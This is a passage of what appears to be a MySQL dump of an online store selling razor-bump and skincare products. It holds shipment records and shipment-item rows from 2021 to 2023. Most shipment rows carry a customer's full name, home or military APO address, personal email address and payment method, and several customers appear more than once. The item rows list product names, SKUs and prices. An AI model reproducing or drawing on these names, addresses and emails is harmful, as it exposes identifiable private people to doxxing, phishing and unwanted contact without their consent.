16:13:08','',3.0000,NULL,'complete','5742 E Lafayette Boulevard,Phoenix,Arizona,85018','5742 E Lafayette Boulevard,Phoenix,Arizona,85018','Todd Leach','Todd Leach','tleach55@hotmail.com',0,'paypal_express','Free Shipping - Free','2021-08-27 22:18:32','2021-08-27 22:18:32'),(30,'IT-00023',3,'IT-00518',56,'2021-09-01 13:27:30','Ryan Fuller',2.0000,NULL,'complete','3820 Grape Rd,Mishawaka,Indiana,46545-2616','3820 Grape Rd,Mishawaka,Indiana,46545-2616','Ryan Fuller','Ryan Fuller','ziva1971@yahoo.com',0,'squareup_payment','United Parcel Service - UPS Ground','2021-09-07 11:58:03','2021-09-07 11:58:03'),(31,'IT-00024',3,'IT-00519',57,'2021-09-01 17:36:50','',1.0000,NULL,'complete','9300 West Lake Dr.,Elk Grove,California,95758','9300 West Lake Dr.,Elk Grove,California,95758','Christopher McLemore','Christopher McLemore','christopher.mclemore@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-09-11 00:19:33','2021-09-11 00:19:33'),(32,'IT-00025',3,'IT-00522',60,'2021-09-10 12:18:30','',1.0000,NULL,'complete','415 hwy 145,Brooksville,Mississippi,39739','415 hwy 145,Brooksville,Mississippi,39739','CARSANDRA MOORE','CARSANDRA MOORE','mrsspecial21@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-09-13 12:54:45','2021-09-13 12:54:45'),(33,'IT-00026',3,'IT-00520',58,'2021-09-02 22:16:21','',2.0000,NULL,'complete','4001 Block Dr\nApt. 2103,Irving,Texas,75038','4001 Block Dr\nApt. 2103,Irving,Texas,75038','Eva Perry','Eva Perry','evajperry@yahoo.com',0,'paypal_express','Free Shipping - Free','2021-10-07 12:41:40','2021-10-07 12:41:40'),(34,'IT-00027',3,'IT-00532',65,'2021-10-11 23:49:24','',1.0000,NULL,'complete','1118 Bowerie Chase,Powder Springs,Georgia,30127','1118 Bowerie Chase,Powder Springs,Georgia,30127','LATARYN DEXTER','LATARYN DEXTER','msdexter10@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-10-13 15:39:48','2021-10-13 15:39:48'),(35,'IT-00028',3,'IT-00528',64,'2021-09-26 19:38:38','',1.0000,NULL,'complete','1750 Camden Road\nApt 110,Charlotte,North Carolina,28203','1750 Camden Road\nApt 110,Charlotte,North Carolina,28203','Kenyattis Surratt','Kenyattis Surratt','kenyattis.surratt@me.com',0,'paypal_express','Flat Rate - Fixed','2021-10-13 15:47:37','2021-10-13 15:47:37'),(36,'IT-00029',3,'IT-00526',63,'2021-09-14 01:24:46','Xavier Jones',1.0000,NULL,'complete','42717 S 80th Ln,Maricopa,Arizona,85139','42717 S 80th Ln,Maricopa,Arizona,85139','Xavier Jones','Xavier Jones','jnx85204@gmail.com',0,'squareup_payment','Flat Rate - Fixed','2021-10-13 15:53:37','2021-10-13 15:53:37'),(37,'IT-00030',3,'IT-00525',62,'2021-09-13 22:09:52','Dayo Oyefuga',1.0000,NULL,'complete','2322 Jefferson Dr.,Sandy Springs,Georgia,30350','2322 Jefferson Dr.,Sandy Springs,Georgia,30350','Dayo Oyefuga','Dayo Oyefuga','dayo.oyefuga@yahoo.com',0,'squareup_payment','Flat Rate - Fixed','2021-10-13 15:59:56','2021-10-13 15:59:56'),(38,'IT-00031',3,'IT-00523',61,'2021-09-13 01:18:04','',1.0000,NULL,'complete','361 17th Street NW\nUnit 2003,Atlanta,Georgia,30363','361 17th Street NW\nUnit 2003,Atlanta,Georgia,30363','Tommy Jamison','Tommy Jamison','opjamis@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-10-13 16:06:05','2021-10-13 16:06:05'),(39,'IT-00032',3,'IT-00521',59,'2021-09-08 09:53:57','',1.0000,NULL,'complete','Crafty Frames LLC,3907 N. 15th Street,MILWAUKEE,Wisconsin,53206','Crafty Frames LLC,3907 N. 15th Street,MILWAUKEE,Wisconsin,53206','Michelle Suber','Michelle Suber','michellesuber3@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-10-13 16:06:59','2021-10-13 16:06:59'),(40,'IT-00033',3,'IT-00537',66,'2021-10-16 23:00:19','',1.0000,NULL,'complete','1460 distribution drive apt 6209,Suwannee,Georgia,30024','1460 distribution drive apt 6209,Suwannee,Georgia,30024','John Davis','John Davis','dougba3@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-10-19 12:14:21','2021-10-19 12:14:21'),(41,'IT-00034',3,'IT-00538',67,'2021-11-12 15:05:31','',1.0000,NULL,'complete','8034 Stephanie court,JONESBORO,Georgia,30236','8034 Stephanie court,JONESBORO,Georgia,30236','Steven Finderson','Steven Finderson','s.finderson@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2021-11-18 22:03:48','2021-11-18 22:03:48'),(42,'IT-00035',3,'IT-00543',68,'2021-11-19 04:58:33','',1.0000,NULL,'complete','2711 Tribeca Place,Fairfield,California,94533','2711 Tribeca Place,Fairfield,California,94533','Emeal Hall III','Emeal Hall III','emeal.hall3@gmail.com',0,'paypal_express','Flat Rate - Fixed','2021-11-20 13:34:54','2021-11-20 13:34:54'),(43,'IT-00036',3,'IT-00547',69,'2021-12-06 02:37:05','',1.0000,NULL,'complete','115 stonewyck pl,Roswell,Georgia,30076','115 stonewyck pl,Roswell,Georgia,30076','Matthias Osayi mennon','Matthias Osayi mennon','m.osayi@hotmail.com',0,'paypal_express','Flat Rate - Fixed','2021-12-09 18:53:15','2021-12-09 18:53:15'),(44,'IT-00037',3,'IT-00553',70,'2022-01-04 16:52:53','Bonita Dewitt',2.0000,NULL,'complete','1140 Winchester ave apt 4,Glendale ,California,91201','1140 Winchester ave apt 4,Glendale ,California,91201','Bonita Dewitt','Bonita Dewitt','dewitt.bonita@gmail.com',0,'squareup_payment','Flat Rate - Fixed','2022-01-07 15:05:00','2022-01-07 15:05:00'),(45,'IT-00038',3,'IT-00554',71,'2022-01-06 16:28:34','Rockney Carter',1.0000,NULL,'complete','1440 Rosedale Drive,Dayton,Ohio,45406','1440 Rosedale Drive,Dayton,Ohio,45406','Rockney Carter','Rockney Carter','rockney.carter@gmail.com',0,'squareup_payment','Flat Rate - Fixed','2022-01-07 15:06:40','2022-01-07 15:06:40'),(46,'IT-00039',3,'IT-00556',73,'2022-01-11 04:20:49','',1.0000,NULL,'complete','5 EAMS/ LBAS\nLouis Berger Aircraft Services,APO,Armed Forces Africa,09366','5 EAMS/ LBAS\nLouis Berger Aircraft Services,APO,Armed Forces Africa,09366','Isaac Livingston Jr','Isaac Livingston Jr','ialwaahid@startmail.com',0,'paypal_express','Flat Rate - Fixed','2022-01-13 21:10:28','2022-01-13 21:10:28'),(47,'IT-00040',3,'IT-00555',72,'2022-01-09 06:54:38','',1.0000,NULL,'complete','849 COMMONWEALTH AVENUE SE,ATLANTA,Georgia,30312','849 COMMONWEALTH AVENUE SE,ATLANTA,Georgia,30312','Mario Johnson','Mario Johnson','mariocjohnson@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-01-14 16:56:09','2022-01-14 16:56:09'),(48,'IT-00041',3,'IT-00557',74,'2022-01-15 16:17:48','Alexander  Ashamole',1.0000,NULL,'complete','10287 calypso dr,Manassas ,Virginia,20110','8103 Pointer lane \nApt 9,Manassas ,Virginia,20109','Alexander  Ashamole','Alexander  Ashamole','uch1@vt.edu',0,'squareup_payment','Flat Rate - Fixed','2022-01-19 06:35:08','2022-01-19 06:35:08'),(49,'IT-00042',3,'IT-00559',75,'2022-02-15 16:49:26','',1.0000,NULL,'complete','12403 Kinship Turn,BOWIE,Maryland,20715-2749','12403 Kinship Turn,BOWIE,Maryland,20715-2749','Christopher Oliver','Christopher Oliver','christopheroliver510@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-02-21 13:32:51','2022-02-21 13:32:51'),(50,'IT-00043',3,'IT-00562',76,'2022-02-18 16:13:50','',2.0000,NULL,'complete','Fitler Club,2400 MARKET ST\n100,PHILADELPHIA,Pennsylvania,19103-3041','Fitler Club,2400 MARKET ST\n100,PHILADELPHIA,Pennsylvania,19103-3041','Tyrell Ginyard','Tyrell Ginyard','Tyrell.Ginyard@fitlerclub.com',0,'paypal_express','United Parcel Service - UPS Ground','2022-02-21 13:36:14','2022-02-21 13:36:14'),(51,'IT-00044',3,'IT-00568',79,'2022-02-24 17:15:00','',1.0000,NULL,'complete','7108 Majestic ct,Vallejo ,California,94591','7108 Majestic ct,Vallejo ,California,94591','Jerrell Rouse','Jerrell Rouse','rellrouse@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-02-24 19:49:02','2022-02-24 19:49:02'),(52,'IT-00045',3,'IT-00564',78,'2022-02-24 02:05:12','',4.0000,NULL,'complete','230 Bill Kennedy Way SE\nApt B424,Atlanta ,Georgia,30316','230 Bill Kennedy Way SE\nApt B424,Atlanta ,Georgia,30316','Courtney Baskerville','Courtney Baskerville','clbaskerville@gmail.com',0,'paypal_express','United Parcel Service - UPS Ground','2022-02-24 19:56:39','2022-02-24 19:56:39'),(53,'IT-00046',3,'IT-00563',77,'2022-02-22 00:59:19','',1.0000,NULL,'complete','5893 Cypress Hill Road,Winter Garden,Florida,34787','5893 Cypress Hill Road,Winter Garden,Florida,34787','Catarsha Tensley','Catarsha Tensley','cmtensley@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-02-24 20:43:42','2022-02-24 20:43:42'),(54,'IT-00047',3,'IT-00569',80,'2022-03-05 00:04:02','',1.0000,NULL,'complete','150 Malcolm Forest Rd,New Castle,Delaware,19720-8746','150 Malcolm Forest Rd,New Castle,Delaware,19720-8746','charles davis','charles davis','chadgus214@hotmail.com',0,'paypal_express','Flat Rate - Fixed','2022-03-07 12:10:32','2022-03-07 12:10:32'),(55,'IT-00048',3,'IT-00570',81,'2022-03-05 13:54:21','',1.0000,NULL,'complete','8034 Stephanie court,JONESBORO,Georgia,30236','8034 Stephanie court,JONESBORO,Georgia,30236','Steven Finderson','Steven Finderson','s.finderson@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-03-07 12:16:19','2022-03-07 12:16:19'),(56,'IT-00049',3,'IT-00571',82,'2022-03-10 00:29:06','keith nichols',6.0000,NULL,'complete','6300 Milgen Rd\nApt 1057,Columbus,Georgia,31907','6300 Milgen Rd\nApt 1057,Columbus,Georgia,31907','keith nichols','keith nichols','keithnichols380@yahoo.com',1,'squareup_payment','Free Shipping - Free','2022-03-10 22:04:27','2022-03-10 22:04:27'),(57,'IT-00050',3,'IT-00572',83,'2022-03-11 13:44:24','',1.0000,NULL,'complete','942 hickory bend road,Atlanta,Georgia,30349','942 hickory bend road,Atlanta,Georgia,30349','Brittany Williams','Brittany Williams','kniesha7@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-03-11 22:58:37','2022-03-11 22:58:37'),(58,'IT-00051',3,'IT-00573',84,'2022-03-14 10:30:00','',1.0000,NULL,'complete','Crafty Frames LLC,3907 N. 15th Street,MILWAUKEE,Wisconsin,53206','Crafty Frames LLC,3907 N. 15th Street,MILWAUKEE,Wisconsin,53206','Michelle Suber','Michelle Suber','michellesuber3@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-03-15 11:36:59','2022-03-15 11:36:59'),(59,'IT-00052',3,'IT-00574',85,'2022-03-14 23:57:21','D’Mitri  Richardson',1.0000,NULL,'complete','3465 Duluth hwy apt 5434,Duluth,Georgia,30096','3465 Duluth hwy apt 5434,Duluth,Georgia,30096','D’Mitri  Richardson','D’Mitri  Richardson','dmitri_richardsonc@yahoo.com',0,'squareup_payment','Flat Rate - Fixed','2022-03-15 11:47:35','2022-03-15 11:47:35'),(60,'IT-00053',3,'IT-00575',86,'2022-03-17 01:09:48','Lamar Frasier',1.0000,NULL,'complete','850 club moss court,Marietta,Georgia,30068','850 club moss court,Marietta,Georgia,30068','Lamar Frasier','Lamar Frasier','lbf41785@gmail.com',0,'squareup_payment','Flat Rate - Fixed','2022-03-17 18:55:50','2022-03-17 18:55:50'),(61,'IT-00054',3,'IT-00576',87,'2022-03-21 14:45:20','Timothy Taylor',2.0000,NULL,'complete','1248 Grampian Pass,Marietta ,Georgia,30008','1248 Grampian Pass,Marietta ,Georgia,30008','Timothy  Taylor','Timothy  Taylor','TaylorLTim@gmail.com',1,'squareup_payment','Flat Rate - Fixed','2022-03-24 15:49:04','2022-03-24 15:49:04'),(62,'IT-00055',3,'IT-00577',88,'2022-03-21 18:26:27','Melody Cypress',1.0000,NULL,'complete','21783 Mears Terrace,Ashburn,Virginia,20147','21783 Mears Terrace,Ashburn,Virginia,20147','Melody Cypress','Melody Cypress','melody.cypress@outlook.com',0,'squareup_payment','Flat Rate - Fixed','2022-03-24 16:22:14','2022-03-24 16:22:14'),(63,'IT-00056',3,'IT-00578',89,'2022-03-30 09:13:18','',1.0000,NULL,'complete','5 EAMS/ LBAS\nLouis Berger Aircraft Services,APO,Armed Forces Africa,09366','5 EAMS/ LBAS\nLouis Berger Aircraft Services,APO,Armed Forces Africa,09366','Isaac Livingston Jr','Isaac Livingston Jr','ialwaahid@startmail.com',0,'paypal_express','Flat Rate - Fixed','2022-03-31 10:26:54','2022-03-31 10:26:54'),(64,'IT-00057',3,'IT-00579',90,'2022-04-10 19:41:48','Harry Ezell III',1.0000,NULL,'complete','1611 Athens Ave SW,Atlanta,Georgia,30310','1611 Athens Ave SW,Atlanta,Georgia,30310','Harry Ezell III','Harry Ezell III','ezellh3@gmail.com',1,'paypal_express','Flat Rate - Fixed','2022-04-15 12:45:56','2022-04-15 12:45:56'),(65,'IT-00058',3,'IT-00584',91,'2022-04-11 13:08:05','',2.0000,NULL,'complete','1455 spring rd se \n257,Smyrna,Georgia,30080','1455 spring rd se \n257,Smyrna,Georgia,30080','Oritsegbegbemi Ojoede','Oritsegbegbemi Ojoede','faithisoken222@icloud.com',0,'paypal_express','United Parcel Service - UPS Ground','2022-04-15 12:51:58','2022-04-15 12:51:58'),(66,'IT-00059',3,'IT-00585',92,'2022-05-26 11:11:02','',2.0000,NULL,'complete','815 BEECH VALLEY RD,Lithia Springs,Georgia,30122','815 BEECH VALLEY RD,Lithia Springs,Georgia,30122','Charles Walden','Charles Walden','waldenautorepair@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-05-30 12:00:26','2022-05-30 12:00:26'),(67,'IT-00060',3,'IT-00586',93,'2022-07-03 03:41:46','Michael  Preston',1.0000,NULL,'complete','16230 Rockside Rd,Maple Heights,Ohio,44137','707 Park Ave apt 1350,Atlanta,Georgia,30326','Michael  Preston','Michael  Preston','mpreston8507@gmail.com',0,'squareup_payment','Flat Rate - Fixed','2022-07-05 06:21:10','2022-07-05 06:21:10'),(68,'IT-00061',3,'IT-00588',94,'2022-07-08 13:20:49','Enias Baganizi',4.0000,NULL,'complete','5771 Oak Forest Ct,Indian Head ,Maryland,20640','5771 Oak Forest Ct,Indian Head ,Maryland,20640','Enias Baganizi','Enias Baganizi','ebaganizi@gmail.com',1,'squareup_payment','Free Shipping - Free','2022-07-11 02:28:23','2022-07-11 02:28:23'),(69,'IT-00062',3,'IT-00589',95,'2022-07-21 19:04:13','Kenyattis Surratt',1.0000,NULL,'complete','3097 Maple Dr\nApt 441,Atlanta,Georgia,30305','3097 Maple Dr\nApt 441,Atlanta,Georgia,30305','Kenyattis Surratt','Kenyattis Surratt','kenyattis.surratt@me.com',0,'squareup_payment','Flat Rate - Fixed','2022-07-25 12:17:31','2022-07-25 12:17:31'),(70,'IT-00063',3,'IT-00594',96,'2022-08-01 03:12:04','',1.0000,NULL,'complete','330 Champions Dr,Fairburn,Georgia,30213-6455','330 Champions Dr,Fairburn,Georgia,30213-6455','Yolanda Taylor','Yolanda Taylor','tyler628@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-08-01 12:53:25','2022-08-01 12:53:25'),(71,'IT-00064',3,'IT-00597',97,'2022-08-02 02:17:38','',1.0000,NULL,'complete','150 Haas Ave Apt 301,San Leandro,California,94577','150 Haas Ave Apt 301,San Leandro,California,94577','Colby Freeman','Colby Freeman','cfree32@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-08-02 11:03:08','2022-08-02 11:03:08'),(72,'IT-00065',3,'IT-00600',98,'2022-08-10 15:25:27','',1.0000,NULL,'complete','1326 Vayda Ct,Marietta,Georgia,30066','1326 Vayda Ct,Marietta,Georgia,30066','Tavarus Adams','Tavarus Adams','tavarusadams@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-08-11 13:01:47','2022-08-11 13:01:47'),(73,'IT-00066',3,'IT-00609',99,'2022-08-13 16:51:08','',1.0000,NULL,'complete','2009 keeling mill ter,Grayson,Georgia,30017','2009 keeling mill ter,Grayson,Georgia,30017','Oritsegbegbemi  Ojoede','Oritsegbegbemi  Ojoede','faithberry0@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-08-14 12:35:42','2022-08-14 12:35:42'),(74,'IT-00067',3,'IT-00610',100,'2022-08-15 15:52:15','',2.0000,NULL,'complete','3725 Sycamore Bend,Decatur,Georgia,30034','3725 Sycamore Bend,Decatur,Georgia,30034','Lester Long','Lester Long','llljr85@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-08-16 04:22:00','2022-08-16 04:22:00'),(75,'IT-00068',3,'IT-00615',101,'2022-08-31 09:18:49','',1.0000,NULL,'complete','8034 Stephanie court,JONESBORO,Georgia,30236','8034 Stephanie court,JONESBORO,Georgia,30236','Steven Finderson','Steven Finderson','s.finderson@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-09-01 17:03:14','2022-09-01 17:03:14'),(76,'IT-00069',3,'IT-00618',102,'2022-09-09 01:02:52','',1.0000,NULL,'complete','5002 WATERVIEW CT,ELLENWOOD,Georgia,30294-3695','5002 WATERVIEW CT,ELLENWOOD,Georgia,30294-3695','Corey Johnson','Corey Johnson','pastorjohnsoncj@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-09-09 17:11:55','2022-09-09 17:11:55'),(77,'IT-00070',3,'IT-00626',103,'2022-10-12 17:03:14','',1.0000,NULL,'complete','5439 Rosehall Place,Atlanta,Georgia,30349','5439 Rosehall Place,Atlanta,Georgia,30349','Alan C. Kelly','Alan C. Kelly','alan.kelly@comcast.net',0,'paypal_express','United Parcel Service - UPS Ground','2022-10-14 15:08:27','2022-10-14 15:08:27'),(78,'IT-00071',3,'IT-00629',105,'2022-10-27 19:13:38','',1.0000,NULL,'complete','Self,131 N Greatwood Glen Pl,Montgomery,Texas,77316','Self,131 N Greatwood Glen Pl,Montgomery,Texas,77316','Gorden Graham','Gorden Graham','gvgraham@bellsouth.net',0,'paypal_express','Flat Rate - Fixed','2022-10-28 19:56:46','2022-10-28 19:56:46'),(79,'V-00008',1,'V-00064',104,'2022-10-26 23:24:27','Mark Patterson',1.0000,NULL,'complete','2401 BIRDS EYE COURT,Fleming Island,Florida,32003','2401 BIRDS EYE COURT,Fleming Island,Federated States Of Micronesia,32003','Mark Patterson','Mark Patterson','MarkPatterson2k83@outlook.com',1,'squareup_payment','Flat Rate - Fixed','2022-10-28 20:11:47','2022-10-28 20:11:47'),(80,'IT-00072',3,'IT-00630',106,'2022-11-18 19:49:02','',2.0000,NULL,'complete','110 Birchwood Drive\nUnit B,Greenville,South Carolina,29605','110 Birchwood Drive\nUnit B,Greenville,South Carolina,29605','Wilson Reginald','Wilson Reginald','reginald.wilson38@icloud.com',0,'paypal_express','Flat Rate - Fixed','2022-11-24 19:43:49','2022-11-24 19:43:49'),(81,'IT-00073',3,'IT-00631',107,'2022-11-30 22:19:47','TraiVon Cooper',1.0000,NULL,'complete','612 Cove Place\nApt. 612,Atlanta,Georgia,30339','612 Cove Place\nApt. 612,Atlanta,Georgia,30339','TraiVon Cooper','TraiVon Cooper','traivon_cooper@yahoo.com',1,'paypal_express','Flat Rate - Fixed','2022-12-06 13:12:00','2022-12-06 13:12:00'),(82,'IT-00074',3,'IT-00632',108,'2022-12-17 19:47:33','',2.0000,NULL,'complete','849 COMMONWEALTH AVENUE SE,ATLANTA,Georgia,30312','849 COMMONWEALTH AVENUE SE,ATLANTA,Georgia,30312','Mario Johnson','Mario Johnson','mariocjohnson@yahoo.com',0,'paypal_express','Flat Rate - Fixed','2022-12-19 12:45:44','2022-12-19 12:45:44'),(83,'IT-00075',3,'IT-00633',109,'2022-12-26 18:18:34','',1.0000,NULL,'complete','1067 Deer Chase,Stone Mountain,Georgia,30088','1067 Deer Chase,Stone Mountain,Georgia,30088','Kevin Bascom','Kevin Bascom','burnmark731@gmail.com',0,'paypal_express','Flat Rate - Fixed','2022-12-27 13:10:02','2022-12-27 13:10:02'),(84,'IT-00076',3,'IT-00634',110,'2022-12-28 01:49:46','',1.0000,NULL,'complete','5439 Rosehall Place,Atlanta,Georgia,30349','5439 Rosehall Place,Atlanta,Georgia,30349','Alan C. Kelly','Alan C. Kelly','alan.kelly@comcast.net',0,'paypal_express','Flat Rate - Fixed','2022-12-28 14:35:43','2022-12-28 14:35:43'),(85,'IT-00077',3,'IT-00635',111,'2022-12-28 22:22:00','',2.0000,NULL,'complete','10463 Pinion Trail,ESCONDIDO,California,92026','10463 Pinion Trail,ESCONDIDO,California,92026','Darryl Freeman','Darryl Freeman','dcfreeman@firstam.com',0,'paypal_express','Free Shipping - Free','2022-12-29 13:32:23','2022-12-29 13:32:23'),(86,'IT-00078',3,'IT-00636',112,'2023-01-04 15:27:49','',2.0000,NULL,'complete','3482 Amber Oaks Drivr,Howell,Michigan,48855','3482 Amber Oaks Drivr,Howell,Michigan,48855','Brytani Griner','Brytani Griner','brytani.griner@gmail.com',0,'paypal_express','Flat Rate - Fixed','2023-01-05 04:26:42','2023-01-05 04:26:42'),(87,'IT-00079',3,'IT-00641',115,'2023-02-22 12:50:55','Jamal Halley',1.0000,NULL,'complete','2226 N Somerset Street,Arlington,Virginia,22205','2226 N Somerset Street,Arlington,Virginia,22205','Jamal Halley','Jamal Halley','jamal.w.halley@gmail.com',1,'paypal_express','Flat Rate - Fixed','2023-02-22 15:34:52','2023-02-22 15:34:52'),(88,'IT-00080',3,'IT-00639',113,'2023-02-14 16:28:04','',2.0000,NULL,'complete','1080 Peachtree ST NE\nUnit 2007,Atlanta,Georgia,30308','1080 Peachtree ST NE\nUnit 2007,Atlanta,Georgia,30308','Gordon Callaway','Gordon Callaway','gordoncharlescallaway@gmail.com',0,'paypal_express','Flat Rate - Fixed','2023-02-22 15:36:45','2023-02-22 15:36:45'),(89,'IT-00081',3,'IT-00640',114,'2023-02-17 23:49:03','',1.0000,NULL,'complete','3338 SW PARSONS COURT,PORTLAND,Oregon,97219','3338 SW PARSONS COURT,PORTLAND,Oregon,97219','DR. HERBERT KITCHEN','DR. HERBERT KITCHEN','herb82364@aol.com',0,'paypal_express','Flat Rate - Fixed','2023-02-22 15:48:23','2023-02-22 15:48:23'),(90,'IT-00082',3,'IT-00642',116,'2023-03-03 02:11:20','',1.0000,NULL,'complete','2107 N decatur rd,decatur,Georgia,30033','2107 N decatur rd,decatur,Georgia,30033','bilal jeanpaul','bilal jeanpaul','bilaljeanpaul@gmail.com',0,'paypal_express','Flat Rate - Fixed','2023-03-03 03:39:41','2023-03-03 03:39:41'),(91,'IT-00083',3,'IT-00643',117,'2023-03-12 00:52:38','',1.0000,NULL,'complete','M.A.S.S. Musiq L.L.C,2943 DIANA DR SW,ATLANTA,Georgia,30315-7907','M.A.S.S. Musiq L.L.C,2943 DIANA DR SW,ATLANTA,Georgia,30315-7907','Michael Shelton','Michael Shelton','masheltonjr@gmail.com',0,'paypal_express','Flat Rate - Fixed','2023-03-16 20:45:29','2023-03-16 20:45:29');

--
-- Table structure for table `sales_shipment_item`
--

CREATE TABLE `sales_shipment_item` (
  `entity_id` int unsigned NOT NULL COMMENT 'Entity ID',
  `parent_id` int unsigned NOT NULL COMMENT 'Parent ID',
  `row_total` decimal(20,4) DEFAULT NULL COMMENT 'Row Total',
  `price` decimal(20,4) DEFAULT NULL COMMENT 'Price',
  `weight` decimal(12,4) DEFAULT NULL COMMENT 'Weight',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `product_id` int DEFAULT NULL COMMENT 'Product ID',
  `order_item_id` int DEFAULT NULL COMMENT 'Order Item ID',
  `additional_data` text COMMENT 'Additional Data',
  `description` text COMMENT 'Description',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sales Flat Shipment Item';

--
-- Dumping data for table `sales_shipment_item`
--

INSERT INTO `sales_shipment_item` VALUES (4,4,NULL,6.9900,NULL,1.0000,89,11,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(5,5,NULL,44.9900,NULL,1.0000,14,8,NULL,NULL,'Razor Bump Solution & Aloe Vera Shave Gel','IT-11141'),(10,8,NULL,25.9900,NULL,1.0000,1,29,NULL,NULL,'Razor Bump Solution','IT-11140'),(11,9,NULL,25.9900,NULL,1.0000,1,34,NULL,NULL,'Razor Bump Solution','IT-11140'),(12,10,NULL,25.9900,NULL,3.0000,1,35,NULL,NULL,'Razor Bump Solution','IT-11140'),(13,11,NULL,25.9900,NULL,2.0000,1,40,NULL,NULL,'Razor Bump Solution','IT-11140'),(14,12,NULL,25.9900,NULL,1.0000,1,39,NULL,NULL,'Razor Bump Solution','IT-11140'),(15,13,NULL,25.9900,NULL,3.0000,1,41,NULL,NULL,'Razor Bump Solution','IT-11140'),(16,13,NULL,6.9900,NULL,2.0000,89,42,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(17,14,NULL,25.9900,NULL,1.0000,1,45,NULL,NULL,'Razor Bump Solution','IT-11140'),(18,15,NULL,25.9900,1.0000,1.0000,495,43,NULL,NULL,'Aloe Vera Facial Cleanser','IT-11111'),(19,15,NULL,25.9900,NULL,1.0000,1,44,NULL,NULL,'Razor Bump Solution','IT-11140'),(20,16,NULL,25.9900,NULL,2.0000,1,47,NULL,NULL,'Razor Bump Solution','IT-11140'),(21,16,NULL,6.9900,NULL,2.0000,89,48,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(22,17,NULL,25.9900,NULL,1.0000,1,49,NULL,NULL,'Razor Bump Solution','IT-11140'),(23,18,NULL,25.9900,NULL,1.0000,1,50,NULL,NULL,'Razor Bump Solution','IT-11140'),(24,19,NULL,25.9900,NULL,1.0000,1,51,NULL,NULL,'Razor Bump Solution','IT-11140'),(25,20,NULL,6.9900,NULL,2.0000,89,52,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(26,20,NULL,25.9900,NULL,1.0000,1,53,NULL,NULL,'Razor Bump Solution','IT-11140'),(27,21,NULL,25.9900,NULL,1.0000,1,46,NULL,NULL,'Razor Bump Solution','IT-11140'),(28,22,NULL,25.9900,1.0000,1.0000,495,54,NULL,NULL,'Aloe Vera Facial Cleanser','IT-11111'),(29,22,NULL,25.9900,1.0000,1.0000,494,55,NULL,NULL,'Oat Protein Facial Scrub','IT-11110'),(30,22,NULL,25.9900,NULL,1.0000,1,56,NULL,NULL,'Razor Bump Solution','IT-11140'),(31,23,NULL,25.9900,NULL,1.0000,1,57,NULL,NULL,'Razor Bump Solution','IT-11140'),(32,24,NULL,44.9900,NULL,1.0000,14,63,NULL,NULL,'Razor Bump Solution & Aloe Vera Shave Gel','IT-A7'),(33,25,NULL,25.9900,NULL,1.0000,1,64,NULL,NULL,'Razor Bump Solution','IT-11140'),(34,26,NULL,25.9900,NULL,6.0000,1,65,NULL,NULL,'Razor Bump Solution','IT-11140'),(35,27,NULL,6.9900,NULL,1.0000,89,66,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(36,28,NULL,27.9900,NULL,1.0000,1,69,NULL,NULL,'Razor Bump Solution','IT-11140'),(37,29,NULL,27.9900,NULL,2.0000,1,67,NULL,NULL,'Razor Bump Solution','IT-11140'),(38,29,NULL,6.9900,NULL,1.0000,89,68,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(39,30,NULL,27.9900,NULL,2.0000,1,70,NULL,NULL,'Razor Bump Solution','IT-11140'),(40,31,NULL,27.9900,NULL,1.0000,1,71,NULL,NULL,'Razor Bump Solution','IT-11140'),(41,32,NULL,27.9900,NULL,1.0000,1,74,NULL,NULL,'Razor Bump Solution','IT-11140'),(42,33,NULL,39.9900,NULL,2.0000,93,72,NULL,NULL,'Dandruff Control Scalp Treatment','IT-11100'),(43,34,NULL,27.9900,NULL,1.0000,1,79,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(44,35,NULL,27.9900,NULL,1.0000,1,78,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(45,36,NULL,27.9900,NULL,1.0000,1,77,NULL,NULL,'Razor Bump Solution','IT-11140'),(46,37,NULL,27.9900,NULL,1.0000,1,76,NULL,NULL,'Razor Bump Solution','IT-11140'),(47,38,NULL,27.9900,NULL,1.0000,1,75,NULL,NULL,'Razor Bump Solution','IT-11140'),(48,39,NULL,27.9900,NULL,1.0000,1,73,NULL,NULL,'Razor Bump Solution','IT-11140'),(49,40,NULL,27.9900,NULL,1.0000,1,80,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(50,41,NULL,27.9900,NULL,1.0000,1,81,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(51,42,NULL,27.9900,NULL,1.0000,1,82,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(52,43,NULL,27.9900,NULL,1.0000,1,83,NULL,NULL,'Razor Bump Solution 4 oz.','IT-11140'),(53,44,NULL,6.9900,NULL,2.0000,89,84,NULL,NULL,'Razor Bumps Solution Samples ','IT-M7'),(54,45,NULL,6.9900,NULL,1.0000,89,85,NULL,NULL,'Razor Bumps 